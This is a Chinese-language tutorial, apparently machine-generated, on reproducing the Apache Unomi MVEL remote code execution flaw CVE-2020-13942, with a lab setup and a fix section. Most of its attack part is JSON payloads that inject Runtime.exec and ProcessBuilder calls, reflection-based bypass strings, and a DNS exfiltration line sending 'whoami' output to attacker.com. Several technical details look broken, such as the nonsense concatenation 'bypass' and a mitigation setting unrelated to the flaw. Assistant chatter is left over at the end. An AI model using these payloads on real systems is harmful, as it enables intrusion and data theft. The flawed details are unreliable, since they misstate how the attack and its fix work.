怎么实现Apache Unomi 远程代码执行漏洞CVE-2020-13942复现

# 怎么实现Apache Unomi 远程代码执行漏洞CVE-2020-13942复现

## 漏洞概述

CVE-2020-13942是Apache Unomi在2020年披露的一个高危远程代码执行漏洞。该漏洞存在于Unomi的MVEL表达式解析机制中，攻击者可通过构造恶意请求实现服务器端任意代码执行，直接影响系统安全性。

### 受影响版本
- Apache Unomi 1.5.x系列（<= 1.5.1）
- 部分早期版本可能同样受影响

## 环境搭建

### 准备工具
1. **漏洞环境**：Apache Unomi 1.5.1
   ```bash
   docker run -p 8181:8181 -d apache/unomi:1.5.1

1. 测试工具：
   • Burp Suite/Postman
   • curl命令行工具
   • Python3（用于POC编写）

环境验证

访问http://localhost:8181应看到Unomi欢迎页面，或通过API端点检查：

curl http://localhost:8181/cxs/

漏洞原理分析

技术背景

Unomi使用MVEL表达式语言进行条件评估，关键问题出在： 1. 未过滤的表达式解析：/context.json端点直接处理用户输入的MVEL表达式 2. Java反射机制滥用：通过MVEL可调用Java类方法（如Runtime.exec()）

漏洞触发点

// 伪代码展示漏洞逻辑
public Response handleContextRequest(@RequestBody String body) {
    MVEL.eval(body); // 危险的无过滤解析
}

复现步骤

步骤1：基础探测

发送正常请求确认服务可用性：

POST /context.json HTTP/1.1
Host: localhost:8181
Content-Type: application/json

{
    "filters": [
        {
            "id": "sampleFilter",
            "filters": [
                {
                    "condition": {
                        "parameterValues": {
                            "test": "hello world"
                        }
                    }
                }
            ]
        }
    ]
}

步骤2：注入MVEL表达式

测试简单表达式执行：

{
    "filters": [
        {
            "id": "exploitFilter",
            "filters": [
                {
                    "condition": {
                        "parameterValues": {
                            "test": "new java.lang.ProcessBuilder('calc').start()"
                        }
                    }
                }
            ]
        }
    ]
}

步骤3：构造RCE Payload

完整利用链示例（Linux系统）：

{
    "personalizations": [
        {
            "id": "malicious",
            "strategy": "matching-first",
            "strategyOptions": {
                "fallback": "var1"
            },
            "contents": [
                {
                    "filters": [
                        {
                            "condition": {
                                "parameterValues": {
                                    "test": "java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')"
                                }
                            }
                        }
                    ]
                }
            ]
        }
    ]
}

步骤4：验证执行结果

检查命令是否执行成功：

docker exec -it [container_id] ls /tmp
# 应看到pwned文件被创建

高级利用技巧

绕过限制方法

1. 字符过滤绕过：

   // 使用字符串拼接
   "test": "j"+"a"+"v"+"a".toUpperCase()
   

2. 利用反射调用：

   "test": "Class.forName('java.lang.Runtime').getMethod('exec', String.class).invoke(null, 'id')"
   

回显型Payload

通过DNS外带数据：

"test": "java.lang.Runtime.getRuntime().exec('nslookup $(whoami).attacker.com')"

修复方案

官方补丁

升级到Apache Unomi 1.5.2+版本，主要修复措施： 1. 禁用危险的MVEL表达式功能 2. 增加输入过滤机制

临时缓解措施

# 在unomi配置文件中禁用相关端点
org.apache.unomi.router.export.enabled=false

法律与道德声明

1. 本技术文章仅限安全研究使用
2. 未经授权测试他人系统属于违法行为
3. 建议在隔离环境进行复现测试

参考资源

1. Apache官方安全公告
2. CVE详细记录
3. MVEL语法文档

注意：实际操作时请确保在授权环境下进行，本文所述方法不得用于非法用途。漏洞复现可能对系统造成影响，建议使用虚拟机环境测试。 “`

该文档包含： 1. 完整的漏洞复现流程 2. 多种Payload示例 3. 修复建议和安全声明 4. 代码块和格式优化 5. 技术细节与原理说明

可根据实际测试环境调整IP/端口等参数，Windows系统需修改命令为calc.exe等对应指令。